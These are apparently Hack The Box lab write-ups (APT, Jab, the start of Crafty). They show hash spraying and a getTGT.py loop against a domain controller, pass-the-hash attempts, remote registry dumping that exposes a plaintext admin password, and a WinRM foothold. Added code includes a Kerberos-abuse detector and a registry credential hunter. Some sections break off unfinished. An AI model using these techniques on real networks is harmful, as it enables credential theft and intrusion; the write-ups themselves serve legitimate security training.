SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:273c48fb014f8e5bf9e2918e3bf7bfbd STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:98590500f99a1bee7559e97ad342d995 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:10cf01167854082e180cf549f63c0285 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:6149000a4f3f7c57642cbee1ea70c3e1 STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         htb.local       445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
。。。

We notice that after a few attempts the connection times out and the tool errors out; re-running it gives the same result. This suggests we have triggered a protective measure on the server: after a number of failed attempts we get blocked, and our IP may be banned.
Since this tool gets blocked, we try another one: impacket's getTGT.py, which requests a TGT; while doing so it reveals the hash that matches. We need to wrap it in a small automation script, getTGT_auto.sh:

#!/bin/bash
# Feed every LM:NT pair from hash_list to getTGT.py for one user;
# a matching hash makes getTGT.py write a .ccache file.

while IFS='' read -r LINE || [ -n "${LINE}" ]
do
	echo "-----------------------"
	echo "Feed the Hash:${LINE}"
	/usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes ${LINE}

done < hash_list

Try one user first; if that fails, try the others. When a TGT is obtained a .ccache file is written, so we also run a watch command to see when that file appears; once it does we can interrupt the script by hand:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# watch "ls -ltr | tail -2"

After a while we found it:

。。。
-----------------------                                                                              
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:945f05a17a39217a6a8b58e9bd26ee46                                                                                             
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra                                                                                               
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)                                                                              
-----------------------                                                                            
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb                                                                                             
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra                                                                                                 
[*] Saving ticket in henry.vinson@htb.local.ccache    
。。。

Save the matching hash. Looking at its structure, the LM part aad3b435... is the fixed value produced for an empty password. As soon as we hold a valid user hash, we immediately try lateral movement with it.
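Added example, not from the write-up, kerbrute or impacket: the Kerberos AS-REQ error codes that make the user validation above and the TGT-based hash collision work, written out as a classifier, plus a DC-side detector for the traffic pattern both steps leave behind. The event record format, timestamps and IP addresses are constructed; on a Windows DC the same outcomes appear as Security events 4768 (result code 0x6, unknown principal) and 4771 (failure code 0x18, pre-authentication failed).

```python
from collections import Counter, defaultdict
from dataclasses import dataclass

# KRB-ERROR error-code values (RFC 4120) that an AS-REQ can come back with.
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # no such account in the realm
KDC_ERR_CLIENT_REVOKED = 18       # account disabled or locked out
KDC_ERR_PREAUTH_FAILED = 24       # pre-auth data did not verify: account exists, key wrong
KDC_ERR_PREAUTH_REQUIRED = 25     # KDC asks for pre-auth: account exists
AS_REP_OK = 0                     # constructed marker: an AS-REP (TGT) was issued


def classify_asreq_result(error_code):
    """What a single KDC answer reveals about the requested principal.
    kerbrute's userenum and the getTGT loop rely on exactly this distinction."""
    if error_code == AS_REP_OK:
        return "valid-credentials"
    if error_code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
        return "invalid-user"
    if error_code in (KDC_ERR_PREAUTH_REQUIRED, KDC_ERR_PREAUTH_FAILED):
        return "valid-user"
    if error_code == KDC_ERR_CLIENT_REVOKED:
        return "valid-user-revoked"
    return "inconclusive"


@dataclass(frozen=True)
class AsReqEvent:
    ts: int          # seconds (constructed clock)
    src_ip: str      # client address seen by the KDC
    user: str        # cname from the AS-REQ
    error_code: int  # AS_REP_OK or a KRB-ERROR code


def detect_kdc_abuse(events, window=300, enum_threshold=25, bruteforce_threshold=20):
    """Sliding-window detector over AS-REQ outcomes, per source address.
    user-enumeration: >= enum_threshold distinct unknown principals within `window` s.
    preauth-bruteforce: >= bruteforce_threshold PREAUTH_FAILED answers for one
    account within `window` s (what feeding 2000 hashes to one user looks like)."""
    alerts = []
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev.src_ip].append(ev)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        enum_raised, brute_raised = False, set()
        start = 0
        for end, ev in enumerate(evs):
            while ev.ts - evs[start].ts >= window:   # slide the window forward
                start += 1
            win = evs[start:end + 1]
            unknown = {e.user for e in win if e.error_code == KDC_ERR_C_PRINCIPAL_UNKNOWN}
            if not enum_raised and len(unknown) >= enum_threshold:
                alerts.append(("user-enumeration", src, len(unknown)))
                enum_raised = True
            failed = Counter(e.user for e in win if e.error_code == KDC_ERR_PREAUTH_FAILED)
            for user, n in failed.items():
                if n >= bruteforce_threshold and user not in brute_raised:
                    alerts.append(("preauth-bruteforce", src, user))
                    brute_raised.add(user)
    return alerts


def build_sample_events():
    """Constructed traffic: one source enumerates 40 names (37 unknown, 3 valid)
    and then sends 30 wrong keys for one valid account before one succeeds; a
    normal workstation logs on repeatedly with two mistyped passwords."""
    events = []
    attacker, workstation = "10.0.0.5", "10.0.0.9"
    valid = {3: "Administrator", 17: "henry.vinson", 29: "APT$"}
    for i in range(40):
        user = valid.get(i, f"user{i:02d}")
        code = KDC_ERR_PREAUTH_REQUIRED if i in valid else KDC_ERR_C_PRINCIPAL_UNKNOWN
        events.append(AsReqEvent(i, attacker, user, code))
    for i in range(30):
        events.append(AsReqEvent(100 + i, attacker, "henry.vinson", KDC_ERR_PREAUTH_FAILED))
    events.append(AsReqEvent(130, attacker, "henry.vinson", AS_REP_OK))
    for i in range(10):
        events.append(AsReqEvent(50 + i * 7, workstation, "henry.vinson", AS_REP_OK))
    events.append(AsReqEvent(60, workstation, "henry.vinson", KDC_ERR_PREAUTH_FAILED))
    events.append(AsReqEvent(61, workstation, "henry.vinson", KDC_ERR_PREAUTH_FAILED))
    return events


def run_sample():
    return detect_kdc_abuse(build_sample_events())


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```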

Pass-the-hash: attempting lateral movement

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

Registry leaking sensitive information

None of the common lateral-movement tools above got in: WinRM rejected the authentication and the SMB/RPC-based exec tools all returned access denied. Another impacket script worth trying is reg.py, which reads the remote registry over the Remote Registry service (MS-RRP). Strictly speaking this is not a lateral-movement technique, but when every usual path is blocked, a low-privileged user who can still query the registry is a lead worth following:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
# Note the familiar name: it is the same as the one shown on the website, so this is the key we want.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht
# This exposes credential information!

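The reg.py queries above were driven by hand, one key at a time. What follows is an added example, not code from the write-up or from impacket, of the same hunt as a recursive walk: it flags string values whose names look like secrets and pairs each with a neighbouring user-name value in the same key. It runs offline against a constructed tree that mirrors the HKU\Software layout seen above; the Policies DWORD and the ExampleVpnClient key are made up to show what the type filter keeps out and what a secret without an identity looks like. The live equivalent is impacket's recursive query (reg.py ... query -keyName 'HKU\Software' -s), whose output can be fed through the same heuristics, or an adapter with the same two methods built on impacket's rrp module.

```python
"""Recursive credential hunt over a registry tree.

Added example (not from the original write-up or from impacket). The
walker only needs an object with subkeys(path) and values(path), so it
runs here against a constructed in-memory tree; a live adapter would
implement the same two methods on top of impacket's rrp module.
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Registry value: (type, data). A tree maps full key path -> {name: value}.
Value = Tuple[str, str]
Tree = Dict[str, Dict[str, Value]]

# Only string types can hold a readable secret; DWORDs named *Password* are noise.
STRING_TYPES = {"REG_SZ", "REG_EXPAND_SZ", "REG_MULTI_SZ"}
# Names that usually hold a secret, and names that say whose secret it is.
SECRET_NAME = re.compile(r"pass(word|wd|phrase)?|pwd|secret|token|api[_-]?key", re.I)
IDENTITY_NAME = re.compile(r"user(name)?|login|account", re.I)


class DictRegistry:
    """In-memory stand-in for a remote hive so the hunt can run offline."""

    def __init__(self, tree: Tree) -> None:
        self.tree = tree

    def subkeys(self, path: str) -> List[str]:
        prefix = path.rstrip("\\") + "\\"
        return sorted({k[len(prefix):].split("\\", 1)[0]
                       for k in self.tree if k.startswith(prefix)})

    def values(self, path: str) -> Dict[str, Value]:
        return self.tree.get(path, {})


def walk(reg, root: str, max_depth: int = 8) -> Iterable[Tuple[str, Dict[str, Value]]]:
    """Depth-first walk yielding (key_path, values) for root and every subkey."""
    stack = [(root.rstrip("\\"), 0)]
    while stack:
        path, depth = stack.pop()
        yield path, reg.values(path)
        if depth < max_depth:
            for name in reversed(reg.subkeys(path)):  # reversed: pop() then visits A before B
                stack.append((path + "\\" + name, depth + 1))


def find_credentials(reg, root: str = "HKU\\Software") -> List[Tuple[str, Optional[str], str, str]]:
    """Return (key_path, identity, value_name, secret); identity is None when no
    user-like string value sits in the same key."""
    hits = []
    for path, values in walk(reg, root):
        strings = {n: d for n, (t, d) in values.items() if t in STRING_TYPES}
        identity = next((d for n, d in strings.items() if IDENTITY_NAME.search(n)), None)
        for name, data in strings.items():
            if SECRET_NAME.search(name):
                hits.append((path, identity, name, data))
    return hits


# Constructed tree mirroring the HKU\Software layout seen in the reg.py output above.
# The Policies DWORD and the ExampleVpnClient key are made-up extra cases.
SAMPLE_TREE: Tree = {
    "HKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer": {
        "ShellState": ("REG_BINARY", "24 00 00 00"),
    },
    "HKU\\Software\\Policies": {"PasswordExpiryWarning": ("REG_DWORD", "0xe")},
    "HKU\\Software\\GiganticHostingManagementSystem": {
        "UserName": ("REG_SZ", "henry.vinson_adm"),
        "PassWord": ("REG_SZ", "G1#Ny5@2dvht"),
    },
    "HKU\\Software\\ExampleVpnClient": {
        "Server": ("REG_SZ", "vpn.example.local"),
        "SavedPassword": ("REG_EXPAND_SZ", "hypothetical-secret"),
    },
}

if __name__ == "__main__":
    for key, who, name, secret in find_credentials(DictRegistry(SAMPLE_TREE)):
        print(f"{key}\n    {name} = {secret}  (identity: {who})")
```

The identity pairing matters in practice: a password value on its own tells you nothing about which account to try it against, and here the UserName beside it is what points at the _adm account.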
We now hold a set of credentials, and the _adm suffix suggests an administrative account. Next, test whether they are valid:

Getting a foothold

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson_adm -p G1#Ny5@2dvht                  
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cat user.txt
0b3df55f82208fb1a9593113a8eac7d2

Post-exploitation enumeration

*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   7:54 AM                Administrator
d-----        9/24/2020   8:39 AM                henry.vinson
d-----        9/24/2020   8:40 AM                henry.vinson_adm
d-r---       11/21/2016   2:39 AM                Public
# Enumerating the contents of every directory again turned up no valuable information or permissions.

Trying to enumerate sensitive files

This step uses a very common wordlist of sensitive file paths, from the project:
https://github.com/carlospolop/Auto_Wordlists/
Its Windows file-inclusion wordlist is the one to use here:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
Filter it in the browser for a few common keywords:
passwd history
Combining that with everything gathered so far, the most likely sensitive file is:
[screenshot omitted]
Sure enough, the file exists and is readable, though only in the henry.vinson_adm profile: the Administrator copy is access-denied and henry.vinson has none:

*Evil-WinRM* PS C:\Program files> cat c:/users/administrator/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Access is denied
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\users\admini...ost_history.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\users\administrator\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\users\admini...ost_history.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Cannot find path 'C:\users\henry.vinson\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershel ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\users\henry....ost_history.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson_adm/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

The history shows the user prompting for an Administrator credential and using it to set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel to 2 ("Send NTLM response only"): the host stops sending LM responses but still authenticates with NTLMv1 rather than NTLMv2, which is worth noting for the rest of the engagement. This shows that the current user

Summary

.....

Jab

Machine description

Difficulty

Medium

Enumeration

Full TCP port scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT --min-rate 10000 -p- 10.129.116.140 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:41 CST
Warning: 10.129.116.140 giving up on port because retransmission cap hit (10).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.82% done; ETC: 16:44 (0:01:40 remaining)
Stats: 0:02:48 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.46% done; ETC: 16:44 (0:00:03 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.26s latency).
Not shown: 60209 filtered tcp ports (no-response), 5320 closed tcp ports (conn-refused)
PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3269/tcp open  globalcatLDAPssl
5270/tcp open  xmp

Nmap done: 1 IP address (1 host up) scanned in 178.76 seconds

Processing the results (note the mistake below: export $tcports expands the variable first, so export is handed the port list as a variable name and fails; the correct form is export tcports, and since nmap runs in the same shell the export is not needed at all):

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# tcports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# export $tcports
export: not an identifier: 53,135,139,445,3269,5270

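The grep open | awk pipeline above works for this scan, but grep matches the word anywhere on the line, so an open|filtered row or a service name such as openvpn would also be swept into the port list. The following is an added example, not from the write-up, that keys on the STATE column instead; the sample is a constructed .nmap excerpt based on the Jab scan plus two made-up rows that a naive grep would count wrongly.

```python
"""Extract open ports from saved nmap output.

Added example (not from the write-up). Replaces the `grep open | awk`
pipeline with a parser that keys on the STATE column, so 'open|filtered'
rows and service names that merely contain the word 'open' are not counted.
"""
import re
from typing import List

# "PORT     STATE SERVICE" rows, e.g.:  53/tcp   open  domain
PORT_ROW = re.compile(r"^(\d{1,5})/(tcp|udp)\s+open\s+\S+")

# Constructed sample in the .nmap format, based on the Jab scan above plus
# two made-up rows that a naive grep for 'open' would pick up wrongly.
NMAP_SAMPLE = """\
Nmap scan report for 10.129.116.140
Host is up (0.26s latency).
Not shown: 60209 filtered tcp ports (no-response), 5320 closed tcp ports (conn-refused)
PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3269/tcp open  globalcatLDAPssl
5270/tcp open  xmp
8080/tcp open|filtered http-proxy
53/udp   open  domain
1194/udp open|filtered openvpn
"""


def open_ports(nmap_text: str, proto: str = "tcp") -> List[int]:
    """Ports whose STATE is exactly 'open' for the given protocol, sorted and de-duplicated."""
    ports = set()
    for line in nmap_text.splitlines():
        m = PORT_ROW.match(line)
        if m and m.group(2) == proto:
            ports.add(int(m.group(1)))
    return sorted(ports)


def port_spec(ports: List[int]) -> str:
    """Comma-separated list in the form nmap's -p option expects."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    # In a shell: tcports=$(python3 this_script.py) ; nmap -sT -sC -sV -p"$tcports" <target>
    print(port_spec(open_ports(NMAP_SAMPLE)))
```
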
Detailed TCP scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT -sC -sV -O -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:52 CST
Nmap scan report for 10.129.116.140
Host is up (0.28s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-01T08:53:32+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5270/tcp open  ssl/xmpp      Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (95%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Server 2012 (91%), Microsoft Windows Vista SP1 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows 10 1709 - 1803 (88%), Microsoft Windows 10 1809 - 2004 (88%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Server 2012 R2 Update 1 (88%), Microsoft Windows Server 2016 build 10586 - 14393 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -26s, deviation: 0s, median: -27s
| smb2-time: 
|   date: 2024-03-01T08:53:24
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.41 seconds

UDP scan (the original command read nmap -sU -p- 1000 10.129.116.140, which nmap takes as all 65535 UDP ports against two targets, 1000 and the host; the top 1000 UDP ports were meant):

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sU --top-ports 1000 10.129.116.140 -oA nmapscan/udports

Vulnerability script scan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap --script=vuln -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpvuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:53 CST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.59% done; ETC: 16:53 (0:00:01 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 88.50% done; ETC: 16:53 (0:00:01 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.31s latency).

PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3269/tcp open  globalcatLDAPssl
5270/tcp open  xmp

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 109.34 seconds

Exploitation

Trying to list SMB shares

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbmap -H 10.129.116.140                                   

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
    host = [ host for host in share_drives_list.keys() ][0]
                              ^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbclient -L //10.129.116.140 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.116.140 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# crackmapexec smb 10.129.116.140
SMB         10.129.116.140  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)

Trying MSRPC with a null session

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# rpcclient -U '' -N 10.129.116.140
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

Looking for public vulnerabilities

Summary

Crafty

Machine description

Crafty is an easy-difficulty Windows machine featuring the exploitation of a `Minecraft` server. Enumerating the version of the server reveals that it is vulnerable to pre-authentication Remote Code Execution (RCE), by abusing `Log4j Injection`. After obtaining a reverse shell on the target, enumerating the filesystem reveals that the administrator composed a Java-based `Minecraft` plugin, which when reverse engineered reveals `rcon` credentials. Those credentials are leveraged with the `RunAs` utility to gain Administrative access, compromising the system.

Difficulty

Easy

Enumeration

Detailed TCP scan

┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap -sT -sV -sC -O -p80,25565 $ip1 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 12:20 EDT
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.24s latency).

PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
